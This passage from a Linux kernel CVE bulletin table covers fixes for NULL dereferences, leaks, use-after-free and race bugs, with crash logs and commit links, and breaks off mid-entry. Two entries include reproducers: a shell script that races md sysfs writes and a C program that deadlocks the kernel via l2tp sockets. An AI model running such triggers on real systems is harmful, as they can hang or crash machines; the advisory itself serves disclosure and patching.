https://git.kernel.org/stable/c/32854bc91ae7debcdefdc7ae881ed83385a04792 https://git.kernel.org/stable/c/734a3deb6614e3597e7e9ef7fb6006c593c5ee18 https://git.kernel.org/stable/c/98e5eb110095ec77cb6d775051d181edbf9cd3cf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Improve page fault error reporting If IOMMU domain for device group is not setup properly then we may hit IOMMU page fault. Current page fault handler assumes that domain is always setup and it will hit NULL pointer dereference (see below sample log). Let's check whether domain is setup or not and log appropriate message. Sample log: ---------- amdgpu 0000:00:01.0: amdgpu: SE 1, SH per SE 1, CU per SH 8, active_cu_number 6 BUG: kernel NULL pointer dereference, address: 0000000000000058 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 2 PID: 56 Comm: irq/24-AMD-Vi Not tainted 6.2.0-rc2+ #89 Hardware name: xxx RIP: 0010:report_iommu_fault+0x11/0x90 [...] Call Trace: <TASK> amd_iommu_int_thread+0x60c/0x760 ? __pfx_irq_thread_fn+0x10/0x10 irq_thread_fn+0x1f/0x60 irq_thread+0xea/0x1a0 ? preempt_count_add+0x6a/0xa0 ? __pfx_irq_thread_dtor+0x10/0x10 ? __pfx_irq_thread+0x10/0x10 kthread+0xe9/0x110 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x2c/0x50 </TASK> [joro: Edit commit message] | 2025-12-09 | not yet calculated | CVE-2023-53789 | https://git.kernel.org/stable/c/be8301e2d5a8b95c04ae8e35d7bfee7b0f03f83a https://git.kernel.org/stable/c/446080b353f048b1fddaec1434cb3d27b5de7efe https://git.kernel.org/stable/c/996d120b4de2b0d6b592bd9fbbe6e244b81ab3cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Zeroing allocated object from slab in bpf memory allocator Currently the freed element in bpf memory allocator may be immediately reused, for htab map the reuse will reinitialize special fields in map value (e.g., bpf_spin_lock), but lookup procedure may still access these special fields, and it may lead to hard-lockup as shown below: NMI backtrace for cpu 16 CPU: 16 PID: 2574 Comm: htab.bin Tainted: G L 6.1.0+ #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), RIP: 0010:queued_spin_lock_slowpath+0x283/0x2c0 ...... Call Trace: <TASK> copy_map_value_locked+0xb7/0x170 bpf_map_copy_value+0x113/0x3c0 __sys_bpf+0x1c67/0x2780 __x64_sys_bpf+0x1c/0x20 do_syscall_64+0x30/0x60 entry_SYSCALL_64_after_hwframe+0x46/0xb0 ...... </TASK> For htab map, just like the preallocated case, there is no need to initialize these special fields in map value again once these fields have been initialized. For preallocated htab map, these fields are initialized through __GFP_ZERO in bpf_map_area_alloc(), so do the similar thing for non-preallocated htab in bpf memory allocator. And there is no need to use __GFP_ZERO for per-cpu bpf memory allocator, because __alloc_percpu_gfp() does it implicitly. | 2025-12-09 | not yet calculated | CVE-2023-53790 | https://git.kernel.org/stable/c/678ea18d6240299fd77d7000c8b1d7e5f274c8af https://git.kernel.org/stable/c/5d447e04290e78bdc1a3a6c321320d384e09c2f1 https://git.kernel.org/stable/c/997849c4b969034e225153f41026657def66d286 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md: fix warning for holder mismatch from export_rdev() Commit a1d767191096 ("md: use mddev->external to select holder in export_rdev()") fix the problem that 'claim_rdev' is used for blkdev_get_by_dev() while 'rdev' is used for blkdev_put(). However, if mddev->external is changed from 0 to 1, then 'rdev' is used for blkdev_get_by_dev() while 'claim_rdev' is used for blkdev_put(). And this problem can be reproduced reliably by following: New file: mdadm/tests/23rdev-lifetime devname=${dev0##*/} devt=`cat /sys/block/$devname/dev` pid="" runtime=2 clean_up_test() { kill -9 $pid echo clear > /sys/block/md0/md/array_state } trap 'clean_up_test' EXIT add_by_sysfs() { while true; do echo $devt > /sys/block/md0/md/new_dev done } remove_by_sysfs(){ while true; do echo remove > /sys/block/md0/md/dev-${devname}/state done } echo md0 > /sys/module/md_mod/parameters/new_array || die "create md0 failed" add_by_sysfs & pid="$pid $!" remove_by_sysfs & pid="$pid $!" sleep $runtime exit 0 Test cmd: ./test --save-logs --logdir=/tmp/ --keep-going --dev=loop --tests=23rdev-lifetime Test result: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 960 at block/bdev.c:618 blkdev_put+0x27c/0x330 Modules linked in: multipath md_mod loop CPU: 0 PID: 960 Comm: test Not tainted 6.5.0-rc2-00121-g01e55c376936-dirty #50 RIP: 0010:blkdev_put+0x27c/0x330 Call Trace: <TASK> export_rdev.isra.23+0x50/0xa0 [md_mod] mddev_unlock+0x19d/0x300 [md_mod] rdev_attr_store+0xec/0x190 [md_mod] sysfs_kf_write+0x52/0x70 kernfs_fop_write_iter+0x19a/0x2a0 vfs_write+0x3b5/0x770 ksys_write+0x74/0x150 __x64_sys_write+0x22/0x30 do_syscall_64+0x40/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd Fix the problem by recording if 'rdev' is used as holder. | 2025-12-09 | not yet calculated | CVE-2023-53791 | https://git.kernel.org/stable/c/99fcd427178d0f58f5520f8f01df727f8eaeb2c7 https://git.kernel.org/stable/c/99892147f028d711f9d40fefad4f33632593864c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-core: fix memory leak in dhchap_ctrl_secret Free dhchap_secret in nvme_ctrl_dhchap_ctrl_secret_store() before we return when nvme_auth_generate_key() returns error. | 2025-12-09 | not yet calculated | CVE-2023-53792 | https://git.kernel.org/stable/c/43d0724d756a13694f612a8a151f835ad6425b93 https://git.kernel.org/stable/c/39b90fc75943406d2bd60fd1ea041aca2559cc5f https://git.kernel.org/stable/c/6ec30a62789913b1bd0f0d44ea4d0d2d5608b1e8 https://git.kernel.org/stable/c/99c2dcc8ffc24e210a3aa05c204d92f3ef460b05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf tool x86: Fix perf_env memory leak Found by leak sanitizer: ``` ==1632594==ERROR: LeakSanitizer: detected memory leaks Direct leak of 21 byte(s) in 1 object(s) allocated from: #0 0x7f2953a7077b in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:439 #1 0x556701d6fbbf in perf_env__read_cpuid util/env.c:369 #2 0x556701d70589 in perf_env__cpuid util/env.c:465 #3 0x55670204bba2 in x86__is_amd_cpu arch/x86/util/env.c:14 #4 0x5567020487a2 in arch__post_evsel_config arch/x86/util/evsel.c:83 #5 0x556701d8f78b in evsel__config util/evsel.c:1366 #6 0x556701ef5872 in evlist__config util/record.c:108 #7 0x556701cd6bcd in test__PERF_RECORD tests/perf-record.c:112 #8 0x556701cacd07 in run_test tests/builtin-test.c:236 #9 0x556701cacfac in test_and_print tests/builtin-test.c:265 #10 0x556701cadddb in __cmd_test tests/builtin-test.c:402 #11 0x556701caf2aa in cmd_test tests/builtin-test.c:559 #12 0x556701d3b557 in run_builtin tools/perf/perf.c:323 #13 0x556701d3bac8 in handle_internal_command tools/perf/perf.c:377 #14 0x556701d3be90 in run_argv tools/perf/perf.c:421 #15 0x556701d3c3f8 in main tools/perf/perf.c:537 #16 0x7f2952a46189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 SUMMARY: AddressSanitizer: 21 byte(s) leaked in 1 allocation(s). ``` | 2025-12-09 | not yet calculated | CVE-2023-53793 | https://git.kernel.org/stable/c/75d65c1cc439606ada882755fd205d13c2c7907d https://git.kernel.org/stable/c/010139bfc6bb9ddab81dbc2cf71cd3a9c28adc7f https://git.kernel.org/stable/c/f3daf02a41e3c11e1a473517a8a6169248fb8e7b https://git.kernel.org/stable/c/99d4850062a84564f36923764bb93935ef2ed108 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix session state check in reconnect to avoid use-after-free issue Don't collect exiting session in smb2_reconnect_server(), because it will be released soon. Note that the exiting session will stay in server->smb_ses_list until it completes the cifs_free_ipc() and logoff() and then deletes itself from the list. | 2025-12-09 | not yet calculated | CVE-2023-53794 | https://git.kernel.org/stable/c/7e4f5c3f01fb0e51ca438e43262d858daf9a0a76 https://git.kernel.org/stable/c/759ffc164d95a32c09528766d74d9b4fb054e8f4 https://git.kernel.org/stable/c/99f280700b4cc02d5f141b8d15f8e9fad0418f65 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: IOMMUFD_DESTROY should not increase the refcount syzkaller found a race where IOMMUFD_DESTROY increments the refcount: obj = iommufd_get_object(ucmd->ictx, cmd->id, IOMMUFD_OBJ_ANY); if (IS_ERR(obj)) return PTR_ERR(obj); iommufd_ref_to_users(obj); /* See iommufd_ref_to_users() */ if (!iommufd_object_destroy_user(ucmd->ictx, obj)) As part of the sequence to join the two existing primitives together. Allowing the refcount to be elevated without holding the destroy_rwsem violates the assumption that all temporary refcount elevations are protected by destroy_rwsem. Racing IOMMUFD_DESTROY with iommufd_object_destroy_user() will cause spurious failures: WARNING: CPU: 0 PID: 3076 at drivers/iommu/iommufd/device.c:477 iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:478 Modules linked in: CPU: 0 PID: 3076 Comm: syz-executor.0 Not tainted 6.3.0-rc1-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023 RIP: 0010:iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:477 Code: e8 3d 4e 00 00 84 c0 74 01 c3 0f 0b c3 0f 1f 44 00 00 f3 0f 1e fa 48 89 fe 48 8b bf a8 00 00 00 e8 1d 4e 00 00 84 c0 74 01 c3 <0f> 0b c3 0f 1f 44 00 00 41 57 41 56 41 55 4c 8d ae d0 00 00 00 41 RSP: 0018:ffffc90003067e08 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888109ea0300 RCX: 0000000000000000 RDX: 0000000000000001 RSI: 0000000000000000 RDI: 00000000ffffffff RBP: 0000000000000004 R08: 0000000000000000 R09: ffff88810bbb3500 R10: ffff88810bbb3e48 R11: 0000000000000000 R12: ffffc90003067e88 R13: ffffc90003067ea8 R14: ffff888101249800 R15: 00000000fffffffe FS: 00007ff7254fe6c0(0000) GS:ffff888237c00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000555557262da8 CR3: 000000010a6fd000 CR4: 0000000000350ef0 Call Trace: <TASK> iommufd_test_create_access drivers/iommu/iommufd/selftest.c:596 [inline] iommufd_test+0x71c/0xcf0 drivers/iommu/iommufd/selftest.c:813 iommufd_fops_ioctl+0x10f/0x1b0 drivers/iommu/iommufd/main.c:337 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:870 [inline] __se_sys_ioctl fs/ioctl.c:856 [inline] __x64_sys_ioctl+0x84/0xc0 fs/ioctl.c:856 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x38/0x80 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd The solution is to not increment the refcount on the IOMMUFD_DESTROY path at all. Instead use the xa_lock to serialize everything. The refcount check == 1 and xa_erase can be done under a single critical region. This avoids the need for any refcount incrementing. It has the downside that if userspace races destroy with other operations it will get an EBUSY instead of waiting, but this kind of racing is already dangerous. | 2025-12-09 | not yet calculated | CVE-2023-53795 | https://git.kernel.org/stable/c/495b327435b0298e9b3b434f5834d459a93673ce https://git.kernel.org/stable/c/99f98a7c0d6985d5507c8130a981972e4b7b3bdc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix information leak in f2fs_move_inline_dirents() When converting an inline directory to a regular one, f2fs is leaking uninitialized memory to disk because it doesn't initialize the entire directory block. Fix this by zero-initializing the block. This bug was introduced by commit 4ec17d688d74 ("f2fs: avoid unneeded initializing when converting inline dentry"), which didn't consider the security implications of leaking uninitialized memory to disk. This was found by running xfstest generic/435 on a KMSAN-enabled kernel. | 2025-12-09 | not yet calculated | CVE-2023-53796 | https://git.kernel.org/stable/c/4e3b4b170bd43db1d8a93a6bd0ea434b17cc86f7 https://git.kernel.org/stable/c/a6807ef0f3b3d8508d3b07a2e35de8a91820a014 https://git.kernel.org/stable/c/2bef8314fcf94ddc27e22d03f237c0fafd00de33 https://git.kernel.org/stable/c/00b5587326625d0fddb2a5f5a3d4acd950102ace https://git.kernel.org/stable/c/117d4f6687b1f74423b5d398ea95c63b262a8e73 https://git.kernel.org/stable/c/f07a8d61b6ea81bb3cbe0638af40f8824d6147fd https://git.kernel.org/stable/c/eebaecef0095bb8f493c03982da75c6e7bae1056 https://git.kernel.org/stable/c/9a5571cff4ffcfc24847df9fd545cc5799ac0ee5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: wacom: Use ktime_t rather than int when dealing with timestamps Code which interacts with timestamps needs to use the ktime_t type returned by functions like ktime_get. The int type does not offer enough space to store these values, and attempting to use it is a recipe for problems. In this particular case, overflows would occur when calculating/storing timestamps leading to incorrect values being reported to userspace. In some cases these bad timestamps cause input handling in userspace to appear hung. | 2025-12-09 | not yet calculated | CVE-2023-53797 | https://git.kernel.org/stable/c/99036f1aed7e82773904f5d91a9897bb3e507fd9 https://git.kernel.org/stable/c/9598a647ecc8f300b0540abf9d3b3439859d163b https://git.kernel.org/stable/c/67ce7724637c6adb66f788677cb50b82615de0ac https://git.kernel.org/stable/c/d89750b19681581796dfbe3689bbb5d439b99b24 https://git.kernel.org/stable/c/bdeaa883b765709f231f47f9d6cc76c837a15396 https://git.kernel.org/stable/c/d0198363f9108e4adb2511e607ba91e44779e8b1 https://git.kernel.org/stable/c/9a6c0e28e215535b2938c61ded54603b4e5814c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ethtool: Fix uninitialized number of lanes It is not possible to set the number of lanes when setting link modes using the legacy IOCTL ethtool interface. Since 'struct ethtool_link_ksettings' is not initialized in this path, drivers receive an uninitialized number of lanes in 'struct ethtool_link_ksettings::lanes'. When this information is later queried from drivers, it results in the ethtool code making decisions based on uninitialized memory, leading to the following KMSAN splat [1]. In practice, this most likely only happens with the tun driver that simply returns whatever it got in the set operation. As far as I can tell, this uninitialized memory is not leaked to user space thanks to the 'ethtool_ops->cap_link_lanes_supported' check in linkmodes_prepare_data(). Fix by initializing the structure in the IOCTL path. Did not find any more call sites that pass an uninitialized structure when calling 'ethtool_ops::set_link_ksettings()'. [1] BUG: KMSAN: uninit-value in ethnl_update_linkmodes net/ethtool/linkmodes.c:273 [inline] BUG: KMSAN: uninit-value in ethnl_set_linkmodes+0x190b/0x19d0 net/ethtool/linkmodes.c:333 ethnl_update_linkmodes net/ethtool/linkmodes.c:273 [inline] ethnl_set_linkmodes+0x190b/0x19d0 net/ethtool/linkmodes.c:333 ethnl_default_set_doit+0x88d/0xde0 net/ethtool/netlink.c:640 genl_family_rcv_msg_doit net/netlink/genetlink.c:968 [inline] genl_family_rcv_msg net/netlink/genetlink.c:1048 [inline] genl_rcv_msg+0x141a/0x14c0 net/netlink/genetlink.c:1065 netlink_rcv_skb+0x3f8/0x750 net/netlink/af_netlink.c:2577 genl_rcv+0x40/0x60 net/netlink/genetlink.c:1076 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0xf41/0x1270 net/netlink/af_netlink.c:1365 netlink_sendmsg+0x127d/0x1430 net/netlink/af_netlink.c:1942 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg net/socket.c:747 [inline] ____sys_sendmsg+0xa24/0xe40 net/socket.c:2501 ___sys_sendmsg+0x2a1/0x3f0 net/socket.c:2555 __sys_sendmsg net/socket.c:2584 [inline] __do_sys_sendmsg net/socket.c:2593 [inline] __se_sys_sendmsg net/socket.c:2591 [inline] __x64_sys_sendmsg+0x36b/0x540 net/socket.c:2591 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was stored to memory at: tun_get_link_ksettings+0x37/0x60 drivers/net/tun.c:3544 __ethtool_get_link_ksettings+0x17b/0x260 net/ethtool/ioctl.c:441 ethnl_set_linkmodes+0xee/0x19d0 net/ethtool/linkmodes.c:327 ethnl_default_set_doit+0x88d/0xde0 net/ethtool/netlink.c:640 genl_family_rcv_msg_doit net/netlink/genetlink.c:968 [inline] genl_family_rcv_msg net/netlink/genetlink.c:1048 [inline] genl_rcv_msg+0x141a/0x14c0 net/netlink/genetlink.c:1065 netlink_rcv_skb+0x3f8/0x750 net/netlink/af_netlink.c:2577 genl_rcv+0x40/0x60 net/netlink/genetlink.c:1076 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0xf41/0x1270 net/netlink/af_netlink.c:1365 netlink_sendmsg+0x127d/0x1430 net/netlink/af_netlink.c:1942 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg net/socket.c:747 [inline] ____sys_sendmsg+0xa24/0xe40 net/socket.c:2501 ___sys_sendmsg+0x2a1/0x3f0 net/socket.c:2555 __sys_sendmsg net/socket.c:2584 [inline] __do_sys_sendmsg net/socket.c:2593 [inline] __se_sys_sendmsg net/socket.c:2591 [inline] __x64_sys_sendmsg+0x36b/0x540 net/socket.c:2591 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was stored to memory at: tun_set_link_ksettings+0x37/0x60 drivers/net/tun.c:3553 ethtool_set_link_ksettings+0x600/0x690 net/ethtool/ioctl.c:609 __dev_ethtool net/ethtool/ioctl.c:3024 [inline] dev_ethtool+0x1db9/0x2a70 net/ethtool/ioctl.c:3078 dev_ioctl+0xb07/0x1270 net/core/dev_ioctl.c:524 sock_do_ioctl+0x295/0x540 net/socket.c:1213 sock_i ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53798 | https://git.kernel.org/stable/c/da81af0ef8092ecacd87fac3229c29e2e0ce39fd https://git.kernel.org/stable/c/942a2a0184f7bb1c1ae4bbc556559c86c054b0d2 https://git.kernel.org/stable/c/6456d80045d6de47734b1a3879c91f72af186529 https://git.kernel.org/stable/c/72808c4ab5fd01bf1214195005e15b434bf55cef https://git.kernel.org/stable/c/9ad685dbfe7e856bbf17a7177b64676d324d6ed7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: api - Use work queue in crypto_destroy_instance The function crypto_drop_spawn expects to be called in process context. However, when an instance is unregistered while it still has active users, the last user may cause the instance to be freed in atomic context. Fix this by delaying the freeing to a work queue. | 2025-12-09 | not yet calculated | CVE-2023-53799 | https://git.kernel.org/stable/c/625bf86bf53eb7a8ee60fb9dc45b272b77e5ce1c https://git.kernel.org/stable/c/048545d9fc6424b0a11e7e8771225bb9afe09422 https://git.kernel.org/stable/c/c4cb61c5f976183c07d16b0071f0c60bc212ef1f https://git.kernel.org/stable/c/867a146690960ac7b89ce40f4ee60dd32eeb1682 https://git.kernel.org/stable/c/c0dbcebc7f390ec7dbe010dcc22c60f0c6bfc26d https://git.kernel.org/stable/c/9ae4577bc077a7e32c3c7d442c95bc76865c0f17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ubi: Fix use-after-free when volume resizing failed There is a use-after-free problem reported by KASAN: ================================================================== BUG: KASAN: use-after-free in ubi_eba_copy_table+0x11f/0x1c0 [ubi] Read of size 8 at addr ffff888101eec008 by task ubirsvol/4735 CPU: 2 PID: 4735 Comm: ubirsvol Not tainted 6.1.0-rc1-00003-g84fa3304a7fc-dirty #14 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc33 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x34/0x44 print_report+0x171/0x472 kasan_report+0xad/0x130 ubi_eba_copy_table+0x11f/0x1c0 [ubi] ubi_resize_volume+0x4f9/0xbc0 [ubi] ubi_cdev_ioctl+0x701/0x1850 [ubi] __x64_sys_ioctl+0x11d/0x170 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 </TASK> When ubi_change_vtbl_record() returns an error in ubi_resize_volume(), "new_eba_tbl" will be freed on the error handling path, but it is still held by "vol->eba_tbl" in ubi_eba_replace_table(). It means that the lifecycles of "vol->eba_tbl" and "vol" are different, so the next time the volume is resized it causes a use-after-free fault. Fix it by not freeing "new_eba_tbl" after it has been installed in ubi_eba_replace_table(); it will be freed on the next volume resize. | 2025-12-09 | not yet calculated | CVE-2023-53800 | https://git.kernel.org/stable/c/bf9875aa7f7d624a8c084425b14bf7e5907ebc30 https://git.kernel.org/stable/c/bf795ebbb9995e2fe7945de71177f01c2f1215dc https://git.kernel.org/stable/c/9c8be1f165baee53b5a36ea0b3c9281d403a1d0b https://git.kernel.org/stable/c/35f8d4064e54c18424db2997059d4c0b1d13d093 https://git.kernel.org/stable/c/53818746e549e61841428892a8d94344494be797 https://git.kernel.org/stable/c/b0c951742348d216f094d16ed4f70ae73db881c0 https://git.kernel.org/stable/c/3d6378f7056ac7350338f941001162a8f660853c https://git.kernel.org/stable/c/9af31d6ec1a4be4caab2550096c6bd2ba8fba472 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/sprd: Release dma buffer to avoid memory leak When attaching to a domain, the driver allocates a DMA buffer which is used to store the address mapping table, and it needs to be released when the IOMMU domain is freed. | 2025-12-09 | not yet calculated | CVE-2023-53801 | https://git.kernel.org/stable/c/92c089a931fd3939cd32318cf4f54e69e8f51a19 https://git.kernel.org/stable/c/8745f3592ee4a7b49ede16ddd3f12a41ecaa23c9 https://git.kernel.org/stable/c/d0a917fd5e3b3ed9d9306b4260ba684b982da9f3 https://git.kernel.org/stable/c/9afea57384d4ae7b2034593eac7fa76c7122762a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: htc_hst: free skb in ath9k_htc_rx_msg() if there is no callback function It is stated that ath9k_htc_rx_msg() either frees the provided skb or passes its management to another callback function. However, the skb is not freed in case there is no other callback function, and Syzkaller was able to cause a memory leak. Also minor comment fix. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2025-12-09 | not yet calculated | CVE-2023-53802 | https://git.kernel.org/stable/c/b11f95f65cc52ee3a756e6f6a88df37a203e25bd https://git.kernel.org/stable/c/68171c006c8645a3e0293a6c3e6037c6538ac1c5 https://git.kernel.org/stable/c/564bc2222bf50eb6cdee715a5431bf4dc9f923c1 https://git.kernel.org/stable/c/ec246dfe006b2a8f36353f7489e4f525114db9a5 https://git.kernel.org/stable/c/c0c0614f143b568cd0e9525d53cf12e5dcd11987 https://git.kernel.org/stable/c/5a84e51f72580fc70066b03f3dac38421e702a0b https://git.kernel.org/stable/c/bbfababb4f899fe1556eac195f9774b6fe675fb6 https://git.kernel.org/stable/c/9b25e3985477ac3f02eca5fc1e0cc6850a3f7e69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ses: Fix slab-out-of-bounds in ses_enclosure_data_process() A fix for: BUG: KASAN: slab-out-of-bounds in ses_enclosure_data_process+0x949/0xe30 [ses] Read of size 1 at addr ffff88a1b043a451 by task systemd-udevd/3271 Checking after (and before in the next loop) addl_desc_ptr[1] is sufficient; we expect the size to be sanitized before the first access to addl_desc_ptr[1]. Make sure we don't walk beyond the end of the page. | 2025-12-09 | not yet calculated | CVE-2023-53803 | https://git.kernel.org/stable/c/da1a955c48a16e16e925d6544793914e52a6fa51 https://git.kernel.org/stable/c/9e5c7d52085b8c84bc82a261580f0eb170039325 https://git.kernel.org/stable/c/467afb1dd630d8c6d172bd6cacc125199b5f4f2d https://git.kernel.org/stable/c/e4dd25da784b2e07dbfbf04509afa4c5a1375227 https://git.kernel.org/stable/c/2b28a7d261cb309912596d6a2d383ca370483527 https://git.kernel.org/stable/c/0dfe68394cbe1d4fe579fb325ecc813c50528c5a https://git.kernel.org/stable/c/799e8dd2022d2e13f0c5c1906b40ceca07a23349 https://git.kernel.org/stable/c/9b4f5028e493cb353a5c8f5c45073eeea0303abd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix use-after-free bug of nilfs_root in nilfs_evict_inode() During unmount process of nilfs2, nothing holds nilfs_root structure after nilfs2 detaches its writer in nilfs_detach_log_writer(). However, since nilfs_evict_inode() uses nilfs_root for some cleanup operations, it may cause use-after-free read if inodes are left in "garbage_list" and released by nilfs_dispose_list() at the end of nilfs_detach_log_writer(). Fix this issue by modifying nilfs_evict_inode() to only clear inode without additional metadata changes that use nilfs_root if the file system is degraded to read-only or the writer is detached. | 2025-12-09 | not yet calculated | CVE-2023-53804 | https://git.kernel.org/stable/c/f31e18131ee2ce80a4da5c808221d25b1ae9ad6d https://git.kernel.org/stable/c/2a782ea8ebd712a458466e3103e2881b4f886cb5 https://git.kernel.org/stable/c/116d53f09ff52e6f98e3fe1f85d8898d6ba26c68 https://git.kernel.org/stable/c/6b4205ea97901f822004e6c8d59484ccfda03faa https://git.kernel.org/stable/c/b8427b8522d9ede53015ba45a9978ba68d1162f5 https://git.kernel.org/stable/c/acc2a40e428f12780004e1e9fce4722d88f909fd https://git.kernel.org/stable/c/fb8e8d58f116d069e5939e1f786ac84e7fa4533e https://git.kernel.org/stable/c/9b5a04ac3ad9898c4745cba46ea26de74ba56a8e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: populate subvp cmd info only for the top pipe [Why] System restart observed while changing the display resolution to 8k with extended mode. System restart was caused by a page fault. [How] When the driver populates subvp info it did it for both the pipes using vblank, which caused an out-of-bounds array access causing the page fault. Added checks to allow the top pipe only to fix this issue. | 2025-12-09 | not yet calculated | CVE-2023-53806 | https://git.kernel.org/stable/c/92e6c79acad4b96efeff261d27bdbd8089a7dd24 https://git.kernel.org/stable/c/375d192eb1f1d9229a6d994da7ba31f3582b106b https://git.kernel.org/stable/c/9bb10b7aaec3b6278f9cc410c17dcaa129bbbbf0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: clocking-wizard: Fix Oops in clk_wzrd_register_divider() Smatch detected this potential error pointer dereference in clk_wzrd_register_divider(). If devm_clk_hw_register() fails then it sets "hw" to an error pointer and then dereferences it on the next line. Return the error directly instead. | 2025-12-09 | not yet calculated | CVE-2023-53807 | https://git.kernel.org/stable/c/2f276dd9c0f835242836d9f6823035158ce2585c https://git.kernel.org/stable/c/b35cb0c05b8dafe23ae5e8b605a91b88bcf4aba7 https://git.kernel.org/stable/c/25dbdfb7b71ef8601d00c6d9a2b1a96de28b30c5 https://git.kernel.org/stable/c/f078a65ebf930f4305e3c415a8338d22391642c9 https://git.kernel.org/stable/c/9c632a6396505a019ea6d12b5ab45e659a542a93 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mwifiex: fix memory leak in mwifiex_histogram_read() Always free the zeroed page on return from 'mwifiex_histogram_read()'. | 2025-12-09 | not yet calculated | CVE-2023-53808 | https://git.kernel.org/stable/c/d3b53ac2b60283f84bcc650aaa8af98500f37b56 https://git.kernel.org/stable/c/7be90670b967d11f53a9d45bc88fa8ac9daf9709 https://git.kernel.org/stable/c/8f717752f94efae84853e17f2589665c330a0cf5 https://git.kernel.org/stable/c/0c4240d23db525208fd40dd6371ca3254fa1b93d https://git.kernel.org/stable/c/308eb3a609ac39ca9c3e466b35e8825007c8d826 https://git.kernel.org/stable/c/84081b4baafb49211193c6a056d5aee9c0e6ab8e https://git.kernel.org/stable/c/5d66b32a6ecf2e2e1a9523eaa4f8b314832fe06c https://git.kernel.org/stable/c/f76e1da838377777557d78dfeb6d8c532f7118be https://git.kernel.org/stable/c/9c8fd72a5c2a031cbc680a2990107ecd958ffcdb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: l2tp: Avoid possible recursive deadlock in l2tp_tunnel_register() When a file descriptor of pppol2tp socket is passed as file descriptor of UDP socket, a recursive deadlock occurs in l2tp_tunnel_register(). This situation is reproduced by the following program: int main(void) { int sock; struct sockaddr_pppol2tp addr; sock = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP); if (sock < 0) { perror("socket"); return 1; } addr.sa_family = AF_PPPOX; addr.sa_protocol = PX_PROTO_OL2TP; addr.pppol2tp.pid = 0; addr.pppol2tp.fd = sock; addr.pppol2tp.addr.sin_family = PF_INET; addr.pppol2tp.addr.sin_port = htons(0); addr.pppol2tp.addr.sin_addr.s_addr = inet_addr("192.168.0.1"); addr.pppol2tp.s_tunnel = 1; addr.pppol2tp.s_session = 0; addr.pppol2tp.d_tunnel = 0; addr.pppol2tp.d_session = 0; if (connect(sock, (const struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("connect"); return 1; } return 0; } This program causes the following lockdep warning: ============================================ WARNING: possible recursive locking detected 6.2.0-rc5-00205-gc96618275234 #56 Not tainted -------------------------------------------- repro/8607 is trying to acquire lock: ffff8880213c8130 (sk_lock-AF_PPPOX){+.+.}-{0:0}, at: l2tp_tunnel_register+0x2b7/0x11c0 but task is already holding lock: ffff8880213c8130 (sk_lock-AF_PPPOX){+.+.}-{0:0}, at: pppol2tp_connect+0xa82/0x1a30 other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(sk_lock-AF_PPPOX); lock(sk_lock-AF_PPPOX); *** DEADLOCK *** May be due to missing lock nesting notation 1 lock held by repro/8607: #0: ffff8880213c8130 (sk_lock-AF_PPPOX){+.+.}-{0:0}, at: pppol2tp_connect+0xa82/0x1a30 stack backtrace: CPU: 0 PID: 8607 Comm: repro Not tainted 6.2.0-rc5-00205-gc96618275234 #56 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014 Call 